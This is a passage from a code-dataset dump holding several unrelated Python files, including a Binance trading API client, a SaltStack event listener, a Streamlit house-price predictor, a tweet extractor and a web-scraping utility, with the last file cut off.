urljoin(BASE_URL, PATH)\n# r = requests.get(url, params=params)\n# if r.status_code == 200:\n# # print(json.dumps(r.json(), indent=2))\n# data = r.json()\n# print(f\"diff={timestamp - data['serverTime']}ms\")\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_price(symbol='BTCUSDT', BASE_URL=BASE_URL):\n# PATH = '/api/v3/ticker/price'\n# params = {\n# 'symbol': symbol\n# }\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, headers=headers, params=params)\n# if r.status_code == 200:\n# print(json.dumps(r.json(), indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_order_book():\n# PATH = '/api/v1/depth'\n# params = {\n# 'symbol': 'BTCUSDT',\n# 'limit': 5\n# }\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, headers=headers, params=params)\n# if r.status_code == 200:\n# print(json.dumps(r.json(), indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# # get_price(symbol='BNBBTC')\n#\n#\n# def order(symbol, side, type, quantity, price, newClientOrderId, BASE_URL=BASE_URL):\n# PATH = '/api/v3/order'\n# timestamp = int(time.time() * 1000)\n# params = {\n# 'symbol': symbol,\n# 'side': side,\n# 'type': type,\n# 'timeInForce': 'GTC',\n# 'newClientOrderId': newClientOrderId,\n# 'quantity': quantity,\n# 'price': price,\n# 'recvWindow': 5000,\n# 'timestamp': timestamp\n# }\n# # params = {\n# # 'symbol': 'BTCUSD',\n# # 'side': 'SELL',\n# # 'type': 'LIMIT',\n# # 'timeInForce': 'GTC',\n# # 'quantity': 0.1,\n# # 'price': 500.0,\n# # 'recvWindow': 5000,\n# # 'timestamp': timestamp\n# # }\n#\n# query_string = urlencode(params)\n# params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.post(url, headers=headers, params=params)\n# if r.status_code == 200:\n# data = r.json()\n# print(json.dumps(data, indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_order(symbol, newClientOrderId, BASE_URL=BASE_URL):\n# PATH = '/api/v3/order'\n# timestamp = int(time.time() * 1000)\n# params 
= {\n#         'symbol': symbol,\n#         # 'orderId': orderId,\n#         'newClientOrderId': newClientOrderId,\n#         'recvWindow': 5000,\n#         'timestamp': timestamp\n#     }\n#\n#     # params = {\n#     #     'symbol': symbol,\n#     #     'orderId': '336683281',\n#     #     'recvWindow': 5000,\n#     #     'timestamp': timestamp\n#     # }\n#\n#     query_string = urlencode(params)\n#     params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n#     url = urljoin(BASE_URL, PATH)\n#     r = requests.get(url, headers=headers, params=params)\n#     if r.status_code == 200:\n#         data = r.json()\n#         print(json.dumps(data, indent=2))\n#     else:\n#         binance_exception_dispatcher(r)\n#\n#\n# ############################\n# def delete_order(symbol, newClientOrderId, orderId=None, BASE_URL=BASE_URL):\n#     PATH = '/api/v3/order'\n#     timestamp = int(time.time() * 1000)\n#     params = {\n#         'symbol': symbol,\n#         # 'orderId': orderId,\n#         'newClientOrderId': newClientOrderId,\n#         'recvWindow': 5000,\n#         'timestamp': timestamp\n#     }\n#\n#     query_string = urlencode(params)\n#     params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n#     url = urljoin(BASE_URL, PATH)\n#     r = requests.delete(url, headers=headers, params=params)\n#     if r.status_code == 200:\n#         data = r.json()\n#         print(json.dumps(data, indent=2))\n#     else:\n#         binance_exception_dispatcher(r)\n\n\nclass Binance:\n\n    def __init__(self, public_key, private_key):\n        self.public_key = public_key\n        self.private_key = private_key\n        self.BASE_URL = 'https://api.binance.com'\n        self.headers = {\n            'X-MBX-APIKEY': self.public_key\n        }\n\n    def market_order(self, symbol, quantity, new_client_order_id, side):\n        PATH = '/api/v3/order'\n        timestamp = int(time.time() * 1000)\n        params = {\n            'symbol': symbol,\n            'side': side,\n            'type': BinanceOrderType.MARKET.name,\n            'newClientOrderId': new_client_order_id,\n            'quantity': quantity,\n            'recvWindow': 15000,\n            'timestamp': timestamp\n        }\n        query_string = urlencode(params)\n        params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n                                       hashlib.sha256).hexdigest()\n        url = urljoin(self.BASE_URL, PATH)\n        r = requests.post(url, headers=self.headers, params=params)\n        if r.status_code == 200:\n            data = r.json()\n            print(json.dumps(data, indent=2))\n            return data\n        else:\n            binance_exception_dispatcher(r)\n\n    # executedQty\n    def limit_order(self, symbol, price, quantity, new_client_order_id, side):\n        PATH = '/api/v3/order'\n        timestamp = int(time.time() * 1000)\n        price = get_non_scientific_value(price)\n        params = {\n            'symbol': symbol,\n            'side': side,\n            'type': BinanceOrderType.LIMIT.name,\n            'timeInForce': 'GTC',\n            'newClientOrderId': new_client_order_id,\n            'quantity': quantity,\n            'price': price,\n            'recvWindow': 15000,\n            'timestamp': timestamp\n        }\n        query_string = urlencode(params)\n        params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n                                       hashlib.sha256).hexdigest()\n        url = urljoin(self.BASE_URL, PATH)\n        r = requests.post(url, headers=self.headers, params=params)\n        if r.status_code == 200:\n            data = r.json()\n            print(json.dumps(data, indent=2))\n            return data\n        else:\n            binance_exception_dispatcher(r)\n\n    # def stop_market_order(self, symbol, stop_price, quantity, newClientOrderId, side=OrderSide.BUY.name):\n    #     PATH = '/api/v3/order'\n    #     timestamp = int(time.time() * 
1000)\n # params = {\n # 'symbol': symbol,\n # 'side': side,\n # 'type': OrderType.STOP_LOSS.name,\n # 'newClientOrderId': newClientOrderId,\n # 'quantity': quantity,\n # 'stopPrice': stop_price,\n # 'recvWindow': 5000,\n # 'timestamp': timestamp\n # }\n # query_string = urlencode(params)\n # params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'),\n # hashlib.sha256).hexdigest()\n # url = urljoin(self.BASE_URL, PATH)\n # r = requests.post(url, headers=headers, params=params)\n # if r.status_code == 200:\n # data = r.json()\n # print(json.dumps(data, indent=2))\n # else:\n # binance_exception_dispatcher(r)\n\n def stop_limit_order(self, symbol, price, stop_price, quantity, newClientOrderId, side):\n price = get_non_scientific_value(price)\n stop_price = get_non_scientific_value(stop_price)\n quantity = float(quantity)\n symbol = symbol.__str__()\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'side': side,\n 'type': BinanceOrderType.STOP_LOSS_LIMIT.name,\n 'timeInForce': 'GTC',\n 'newClientOrderId': newClientOrderId,\n 'quantity': quantity,\n 'price': price,\n 'stopPrice': stop_price,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n url = urljoin(self.BASE_URL, PATH)\n r = requests.post(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n def get_price(self, symbol):\n PATH = '/api/v3/ticker/price'\n params = {\n 'symbol': symbol\n }\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n # print(json.dumps(r.json(), indent=2))\n return float(r.json()['price'])\n else:\n binance_exception_dispatcher(r)\n\n def get_current_position(self):\n PATH = '/sapi/v1/capital/config/getall'\n timestamp = int(time.time() * 1000)\n print(str(timestamp))\n params = {\n 'recvWindow': 5000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # def amend_stop_limit_order(self):\n # pass\n\n def delete_order(self, symbol, origClientOrderId):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n # 'orderId': orderId,\n 'origClientOrderId': origClientOrderId,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.delete(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n log.debug_daily(data)\n return data\n # print(json.dumps(data, indent=2))\n else:\n binance_exception_dispatcher(r)\n\n def get_all_open_orders(self, symbol):\n PATH = '/api/v3/openOrders'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = 
urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n log.debug_daily(data)\n return data\n else:\n binance_exception_dispatcher(r)\n\n def get_asset_amount(self, asset):\n r = self.get_user_commission()\n balances = r['balances']\n for balance in balances:\n if asset.__eq__(balance['asset']):\n return Decimal(balance['free'])\n raise ValueError(\"This asset was not found on Binance response\")\n\n def get_order_by_client_order_id(self, symbol, client_order_id):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'origClientOrderId': client_order_id,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # {\n # \"makerCommission\": 15, #==0.15%\n # \"takerCommission\": 15,\n # \"buyerCommission\": 0,\n # \"sellerCommission\": 0,\n # \"canTrade\": true,\n # \"canWithdraw\": true,\n # \"canDeposit\": true,\n # \"updateTime\": 123456789,\n # \"accountType\": \"SPOT\",\n # \"balances\": [\n # {\n # \"asset\": \"BTC\",\n # \"free\": \"4723846.89208129\",\n # \"locked\": \"0.00000000\"\n # },\n # {\n # \"asset\": \"LTC\",\n # \"free\": \"4763368.68006011\",\n # \"locked\": \"0.00000000\"\n # }\n # ]\n # }\n def get_user_commission(self):\n PATH = '/api/v3/account'\n timestamp = int(time.time() * 1000)\n params = {\n 'recvWindow': 5000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n def delete_all_orders(self, symbol):\n orders = self.get_all_open_orders(symbol)\n for i in orders:\n self.delete_order(i['symbol'], i['clientOrderId'])\n\n\n# from trade.settings import binance_private_key, binance_public_key\n\n# amir = Binance(public_key=binance_public_key, private_key=binance_private_key)\n# amir.get_user_comissiomn()\n# print(amir.get_current_position())\n# don't use amir.stop_market_order('BTCUSDT', 2000, .005, \"hassan1234\", side=OrderSide.SELL.name)\n# print(amir.limit_order('BTCUSDT', 10000, 0.01, \"amir32421\", side=BinanceOrderSide.BUY.value))\n# print(amir.market_order(symbol='BTCUSDT', quantity=0.001133, new_client_order_id=\"amir32421\",\n# side=BinanceOrderSide.SELL.value))\n# {'symbol': 'BTCUSDT', 'orderId': 2807755477, 'orderListId': -1, 'clientOrderId': 'amir32421',\n# 'price': '9200.00000000', 'origQty': '0.00113300', 'executedQty': '0.00000000', 'cummulativeQuoteQty': '0.00000000',\n# 'status': 'NEW', 'timeInForce': 'GTC', 'type': 'LIMIT', 'side': 'BUY', 'stopPrice': '0.00000000',\n# 'icebergQty': '0.00000000', 'time': 1596274492503, 'updateTime': 1596274492503, 'isWorking': True,\n# 'origQuoteOrderQty': '0.00000000'}\n\n# 
{\n# \"symbol\": \"BTCUSDT\",\n# \"orderId\": 2808309613,\n# \"orderListId\": -1,\n# \"clientOrderId\": \"amir32421\",\n# \"transactTime\": 1596277898879,\n# \"price\": \"0.00000000\",\n# \"origQty\": \"0.00113300\",\n# \"executedQty\": \"0.00113300\",\n# \"cummulativeQuoteQty\": \"13.20812878\",\n# \"status\": \"FILLED\",\n# \"timeInForce\": \"GTC\",\n# \"type\": \"MARKET\",\n# \"side\": \"SELL\",\n# \"fills\": [\n# {\n# \"price\": \"11657.66000000\",\n# \"qty\": \"0.00113300\",\n# \"commission\": \"0.00047283\",\n# \"commissionAsset\": \"BNB\",\n# \"tradeId\": 370100694\n# }\n# ]\n# }\n\n\n# print(amir.get_order_by_client_order_id('BTCUSDT', \"amir32421\"))\n# print(amir.delete_order(symbol='BTCUSDT', origClientOrderId=\"amir32421\"))\n# print(amir.get_asset_amount(\"BTC\"))\n# print(json.dumps(a, indent=4, sort_keys=True))\n# console.log(binance.roundStep(quantity, symbol); // Returns 8\n\n# for i in range(0, 1, 1):\n# print(i)\n# if orders[i] is not None and orders[i]['clientOrderId'] is not None:\n# amir.delete_order(orders[i]['symbol'], orders[i]['clientOrderId'])\n\n# amir = Binance(public_key=bi_key, private_key=bi_sec)\n# amir.stop_limit_order('BTCUSDT', 5000, 5000, 0.002, \"amir4r2\", side=OrderSide.SELL.name)\n# amir.market_order('BNBBTC', 0.06, 'order-10', side=BinanceOrderSide.BUY.name)\n# amir.limit_order('ATOMUSDT', 4.35000000, 2.38400000, \"order1455\", side=BinanceOrderSide.BUY.value)\n# amir.delete_order(\"ATOMUSDT\", 'order1455')\n","sub_path":"api/binance_api.py","file_name":"binance_api.py","file_ext":"py","file_size_in_byte":21395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"564875283","text":"import salt.config\nimport salt.utils.event\n\nETC_SALT_MASTER = \"/etc/salt/master\"\n\n\nclass SaltListener:\n def __init__(self, timeout=None):\n opts = salt.config.client_config(ETC_SALT_MASTER)\n self.listener = salt.utils.event.get_event(\n \"master\",\n sock_dir=opts[\"sock_dir\"],\n transport=opts[\"transport\"],\n opts=opts,\n raise_errors=True,\n )\n if timeout is None:\n self.timeout_secs = 0\n else:\n self.timeout_secs = timeout.total_seconds()\n\n def __iter__(self):\n while True:\n yield self.listener.get_event(wait=self.timeout_secs, full=True)\n","sub_path":"salt/schedule-commands/salt_listener.py","file_name":"salt_listener.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"537140312","text":"# Import Libraries\r\nfrom numpy.testing._private.utils import IgnoreException\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom streamlit.proto.DataFrame_pb2 import Float64Index\r\n\r\n# Title\r\nst.write(\"\"\"\r\n# Boston House Prediction 🏠\r\n\"\"\")\r\n\r\n# Load Boston Dataset\r\nboston = datasets.load_boston()\r\nX = pd.DataFrame(boston.data, columns=boston.feature_names)\r\ny = pd.DataFrame(boston.target, columns=['House Median Value'])\r\n\r\n# Sidebar\r\nst.sidebar.header('Features')\r\n\r\n\r\ndef features():\r\n CRIM = st.sidebar.slider('Crime Rate (per capita)', 0.00, 88.98)\r\n ZN = st.sidebar.slider('Residential Zone (sq.ft)', 0.00, 100.00)\r\n INDUS = st.sidebar.slider('Industrial Zone (sq.ft)', 0.46, 27.74)\r\n CHAS = st.sidebar.slider('Charles River', 0.00, 1.00)\r\n NOX = st.sidebar.slider('Nitrogen Oxide Concentration', 0.38, 0.87)\r\n RM = st.sidebar.slider('Average Number of Rooms', 3.56, 8.78)\r\n AGE = st.sidebar.slider('Age of House', 2.90, 100.00)\r\n DIS = st.sidebar.slider(\r\n 'Distance from 5 Boston Employment Centres', 1.12, 12.12)\r\n RAD = st.sidebar.slider('Accessibility to Radial Highways', 1.00, 24.00)\r\n TAX = st.sidebar.slider('Property Tax Rate ($)', 187.00, 771.00)\r\n PTRATIO = st.sidebar.slider('Pupil Teacher Ratio', 12.60, 22.00)\r\n B = st.sidebar.slider('Proportion of Blacks', 0.32, 396.90)\r\n LSTAT = st.sidebar.slider('Lower Status of Population (%)', 1.73, 37.97)\r\n data = {'CRIM': CRIM,\r\n 'ZN': ZN,\r\n 'INDUS': INDUS,\r\n 'CHAS': CHAS,\r\n 'NOX': NOX,\r\n 'RM': RM,\r\n 'AGE': AGE,\r\n 'DIS': DIS,\r\n 'RAD': RAD,\r\n 'TAX': TAX,\r\n 'PTRATIO': PTRATIO,\r\n 'B': B,\r\n 'LSTAT': LSTAT}\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\n\r\n\r\ndf = features()\r\n\r\nst.header('Features')\r\nst.write(df)\r\n\r\n# Data Description\r\ndata = {\r\n 'Data': ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'BLACK', 'LSTAT', 'MEDV'],\r\n 'Description': ['Crime Rate', 'Residential Zone', 'Industrial Zone', 'Charles River', 'Nitrogen Oxide Concentration', 'Average Number of Rooms', 'Age of House', 'Distance to 5 Boston Employment Centres', 'Accessibility to Radial Highways', 'Property Tax Rate', 'Pupil Teacher Ratio', 'Proportion of Black', 'Lower Status of Population', 'Median Value of Owner Occupied Homes']\r\n}\r\n\r\ndescription = pd.DataFrame(data)\r\n\r\nst.subheader('Data Description')\r\nst.write(description)\r\n\r\n# Import Model\r\nmodel = pickle.load(open('Regression_Model.pkl', 'rb'))\r\n\r\n# Make Prediction\r\nst.header('Prediction')\r\nst.write(f'Median Value of Owner Occupied Home : {model.predict(df)}')\r\n","sub_path":"Boston Housing Regression/House_Price_Regression.py","file_name":"House_Price_Regression.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"232347464","text":"import datetime as dt\nimport configparser\nimport sys\nfrom DAO.twitter import Twitter\nfrom DAO.mongo import Mongo\nfrom pymongo.errors import DuplicateKeyError\n\ndef main(config_file, since=dt.datetime.now().strftime(\"%Y-%m-%d\")):\n config = configparser.RawConfigParser()\n config.read(config_file)\n\n twitter = Twitter(config_file)\n mongo = Mongo(config_file)\n mg_client = mongo.connect()\n tweets_to_classify = mg_client.datapop.tweets_to_classify\n\n players = config.get('data', 'players').split(',')\n print(players)\n\n for player in players:\n tweets = twitter.getTweetsOfPlayer(player, since)\n print(\"{}:\\n\".format(player))\n for tweet in tweets:\n try:\n tweets_to_classify.insert_one(tweet)\n except DuplicateKeyError:\n pass\n #tweets_to_classify.insert_many(tweets)\n\nif __name__ == '__main__':\n if len(sys.argv) >= 3:\n main(sys.argv[1], sys.argv[2])\n elif len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print('Indique um arquivo de configuração!')\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"597746465","text":"\"\"\" \nCMScraping utility class: UtilScraping\nAuthor: Wells Zhang\nDatetime: 2017-4-29 \n\"\"\"\n\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom Entities.ScrapingRule import ScrapingRule\nfrom Entities.Url import UrlAccessHistory\nfrom globalutilities import UTIL_LOG, UTIL_DB\nfrom globalvars import *\n\n\n# Utility class for web scraping operation\nclass UtilScraping:\n \"\"\" Utility class for scraping operation \"\"\"\n _doc_blacklist = None\n _scraping_rule = None\n\n def __init__(self):\n \"\"\"\n Scraping utility class to help do web scraping operations.\n :return:\n \"\"\"\n return\n\n # Blacklist operation methods\n def get_url_blacklist(self):\n \"\"\"\n Get the url blacklist\n :return: Document list\n \"\"\"\n if self._doc_blacklist is None:\n self._doc_blacklist = UTIL_DB.find(COL_BLACKLIST, query_filter={'status': 'Active'})\n\n return self._doc_blacklist\n\n def refresh_url_blacklist(self):\n \"\"\"\n Reload the url blacklist to refresh the latest content.\n :return: None\n \"\"\"\n self._doc_blacklist = UTIL_DB.find(COL_BLACKLIST, query_filter={'status': 'Active'})\n\n def exits_in_url_blacklist(self, url):\n \"\"\"\n Check if specific url in the blacklist\n :param url: True for exists and False for not found\n :return: \n \"\"\"\n for blacklist_item in self.get_url_blacklist():\n if re.search(blacklist_item['url'], url) is not None:\n return True\n\n return False\n\n # Routine URL operations\n def get_routine_urls(self):\n \"\"\"\n Fetch the target url list from database\n \"\"\"\n\n # The data structure of collection RoutineUrlList as below\n # {\n # \"_id\" : ObjectId(\"58ca0635f5e5454a930515a9\"),\n # \"url\" : \"http://finance.sina.com.cn/stock/\",\n # \"access_history\" : {},\n # \"scraping_rule\" : [\n # {\n # \"field_name\" : \"title\",\n # \"tag\" : \"h1\",\n # \"property\" : \"id\",\n # \"filter\" : \"artibodyTitle\"\n # },\n # {\n # \"field_name\" : \"article_body\",\n # \"tag\" : \"div\",\n # \"property\" : \"id\",\n # \"filter\" : \"articleContent\"\n # },\n # {\n # \"field_name\" : \"article_datetime\",\n # \"tag\" : \"span\",\n # \"property\" : \"class\",\n # \"filter\" : \"time-source\"\n # },\n # {\n # \"field_name\" : \"article_editor\",\n # \"tag\" : \"p\",\n # \"property\" : \"class\",\n # \"filter\" : \"article-editor\"\n # },\n # {\n # \"field_name\" : \"article_summary\",\n # \"tag\" : \"\",\n # \"property\" : \"\",\n # \"filter\" : \"\"\n # }\n # ],\n # \"active\" : true\n # }\n\n _start = datetime.now()\n lst_target = UTIL_DB.find(COL_ROUTINE_URL_LIST, {'active': True})\n _duration = datetime.now() - _start\n UTIL_LOG.operation_log('%s - 获得%s待扫描目标地址,本次操作耗时%s。' % (datetime.now(),\n lst_target.count(),\n _duration), True)\n\n return lst_target\n\n def update_routine_history(self, url, doc):\n \"\"\" Update the routine history.\n\n keyword arguments:\n url: the url which scraped, used to find the match from target url list.\n doc: the document of target list which added the right history list item.\n \"\"\"\n UTIL_DB.update(COL_ROUTINE_URL_LIST, {'url': url}, doc)\n\n # Scraping rule operations\n def set_scraping_rule(self, routine_url):\n \"\"\"\n Set and initialize the ScrapingRule instance\n :param routine_url:\n :return:\n \"\"\"\n self._scraping_rule = ScrapingRule(routine_url)\n\n def get_scraping_rule(self):\n \"\"\"\n Get the ScrapingRule instance\n :return:\n \"\"\"\n return self._scraping_rule\n\n # Page manipulate operations\n def 
parse_urls_in_page_content(self, bs_obj: BeautifulSoup, apply_blacklist_check=True):\n        \"\"\"\n        Collect every url link on the given page and save it into the database's pending-scrape url list\n        :param bs_obj: BeautifulSoup object, the page content\n        :param apply_blacklist_check: whether to apply the blacklist check; urls matched by the blacklist are not recorded.\n        :return:\n        \"\"\"\n        lst_urls = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n\n        # Build a filtered copy instead of calling remove() on the list being\n        # iterated, which would silently skip the element after each removal.\n        kept_urls = []\n        for url_tag in lst_urls:\n            if apply_blacklist_check and self.exits_in_url_blacklist(url_tag['href']):\n                # Found in the blacklist, do not record it\n                UTIL_LOG.operation_log('%s hit in the blacklist check, no save.' % url_tag['href'], debug_only=True)\n            else:\n                # Add to UrlAccessHistory collection if not visited yet\n                history = UrlAccessHistory(url_tag['href'])\n                if not history.has_visited():\n                    history.save()\n                    kept_urls.append(url_tag)\n\n        return kept_urls\n\n    def unvisited_urls(self):\n        \"\"\"\n        Return every url in the UrlAccessHistory collection that has not been visited yet\n        :return: list object\n        \"\"\"\n        return UTIL_DB.find(target_collection=COL_ACCESS_HISTORY, query_filter={'access_datetime': ''})\n\n    def has_visited(self, url: str):\n        \"\"\"\n        Check if the specified URL has been visited before.\n        :param url: \n        :return: \n        \"\"\"\n        doc = UTIL_DB.find_one(COL_ACCESS_HISTORY, {'url': url})\n        if doc is not None and len(doc) > 0:\n            if doc['access_datetime'] != '':\n                return True\n            else:\n                return False\n        else:\n            return False\n\n    def parse_and_save_article_content(self, bs_obj: BeautifulSoup):\n        \"\"\"\n        Scrape and save the article content according to the scraping rule\n        :param bs_obj: the BeautifulSoup object to scrape\n        :return:\n        \"\"\"\n        # TODO: Need to study how to generalize and make the reusable scraping rule model\n        # scraping_rule = self.get_scraping_rule()\n\n        return\n\n    def fetch_url(self, url: str, force_visit=False, ignore_error=True, check_blacklist=True):\n        \"\"\" \n        Fetch web content from given url.\n        :param url: string, the target url to fetch.\n        :param force_visit: force visit even has visited before\n        :param ignore_error: Ignore raised error\n        :param check_blacklist: Check blacklist before access, bypass if exists in the blacklist.\n        :return BeautifulSoup object\n        \"\"\"\n\n        if check_blacklist:\n            if self.exits_in_url_blacklist(url):\n                UTIL_LOG.operation_log('%s targeted by blacklist checking, access bypassed.' % url, debug_only=True)\n                return\n\n        if not force_visit and self.has_visited(url):\n            # The url has been visited before and a revisit is not forced\n            UTIL_LOG.operation_log('%s targeted by visited checking, access bypassed.' 
% url, debug_only=True)\n            return\n\n        # Normalize the url: \\s matches any whitespace (space, tab, newline,\n        # full-width space, etc.), all of which is stripped out\n        url = re.compile(r'\\s').sub('', url)\n\n        res = requests.get(url)\n        res.encoding = res.apparent_encoding\n        UTIL_LOG.operation_log(log='%s, status code:%s' % (url, res.status_code), debug_only=True)\n\n        try:\n            res.raise_for_status()\n        except Exception as e:\n            # An error occurred, return None\n            UTIL_LOG.error_log(e, debug_only=True)\n            if not ignore_error:\n                raise e\n            return None\n\n        bs_obj = BeautifulSoup(res.text, 'lxml')\n        return bs_obj\n\n    def fetch_article_list(self, url):\n        \"\"\" \n        Fetch article list from given url.\n\n        keyword arguments:\n        url: string, the url to fetch the article list\n        \"\"\"\n\n        _starttime = datetime.now()\n        bs_obj = self.fetch_url(url)\n\n        lst_articles = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n        # Filter into a new list rather than removing items mid-iteration\n        lst_articles = [i for i in lst_articles\n                        if i['href'].rfind('.shtml') - i['href'].rfind('/') - 1 >= 12 and i.string is not None]\n\n        _executeduration = datetime.now() - _starttime\n\n        UTIL_LOG.operation_log(\n            \"%s - from %s fetched %s article items to process; this operation took %s\" % (datetime.now(), url, len(lst_articles), _executeduration))\n\n        return lst_articles\n\n    def parse_all_url_from_page(self, url):\n        \"\"\"\n        Scrape every hyperlink from the given page\n        Default rule: target=_blank and href ending in shtml\n        Returns: the list of urls found\n        \"\"\"\n        _start = datetime.now()\n        bs_obj = self.fetch_url(url)\n        lst_urls = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n        UTIL_LOG.operation_log('At %s found %s hyperlinks; this operation took %s' % (url,\n                                                  len(lst_urls),\n                                                  datetime.now() - _start))\n        return lst_urls\n\n    def parse_content_from_bsobj(self, bs_obj, target, parse_filter):\n        \"\"\" Parse content from inputted BeautifulSoup object\n\n        keyword arguments:\n        bs_obj: the BeautifulSoup object to manipulate\n        target: the html tag which are looking for\n        parse_filter: the rules to match the specific tag\n        \"\"\"\n        result = bs_obj.find(target, parse_filter)\n        if result is not None:\n            return result.get_text()\n        else:\n            return ''\n","sub_path":"CME/Utilities/utilScraping.py","file_name":"utilScraping.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
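+The filtered-copy pattern used twice above exists because list.remove() inside a for loop over the same list silently skips the element that slides into the removed slot. A short demonstration of the failure mode:
+
+    items = [1, 2, 3, 4]
+    for x in items:
+        if x < 10:
+            items.remove(x)   # shifts the list while the loop index advances
+    assert items == [2, 4]    # 2 and 4 were skipped, not removed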
+{"seq_id":"173711892","text":"import pickle\nfrom math import ceil\nimport os.path\n\n\ndef file_exist():\n if os.path.exists(\"test.txt\"):\n b = open_file()\n print(b)\n return\n else:\n a = []\n with open(\"test.txt\", 'wb') as f:\n pickle.dump(a, f)\n return\n\n\n\ndef open_file():\n with open(\"test.txt\", \"rb\") as f:\n b = pickle.load(f)\n return b\n\ndef write_file(liste):\n with open(\"test.txt\", 'wb') as f:\n pickle.dump(liste, f)\n\ndef create_user(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n return\n a.append(['Unknow', name, 0,0,0])\n write_file(a)\n\ndef add_canette(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] += 1\n write_file(a)\n return i[2]\n return 0\n\ndef add_gateau(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[3] += 1\n write_file(a)\n return i[3]\n return 0\n\ndef rm_canette(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] -= 1\n write_file(a)\n return i[2]\n return 0\n\ndef rm_gateau(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[3] -= 1\n write_file(a)\n return i[3]\n return 0\n\ndef add_autre(name,value):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[4] += value\n write_file(a)\n return i[4]\n return 0\ndef rm_autre(name,value):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[4] -= value\n write_file(a)\n return i[2]\n return 0\n\ndef 